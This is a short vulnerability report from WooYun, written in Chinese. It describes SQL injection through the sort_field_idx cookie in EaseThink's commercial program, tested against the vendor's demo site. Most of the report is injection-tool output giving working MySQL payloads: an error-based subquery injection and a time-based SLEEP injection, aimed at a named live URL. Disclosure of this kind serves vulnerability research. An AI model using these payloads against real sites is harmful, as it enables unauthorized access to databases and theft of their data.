WooYun.org

这个是官方提供的商业版程序，下面测试的是演示站点：
http://demo.easethink.com/t1/index.php （官方演示站点）
cookie = sort_field_idx=1 未做处理
---
Place: Cookie
Parameter: sort_field_idx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: sort_field_idx=1 AND (SELECT 2551 FROM(SELECT COUNT(*),CONCAT(CHAR(
58,104,108,121,58),(SELECT (CASE WHEN (2551=2551) THEN 1 ELSE 0 END)),CHAR(58,10
5,108,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); so
rt_type_idx=desc
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sort_field_idx=1 AND SLEEP(5); sort_type_idx=desc
---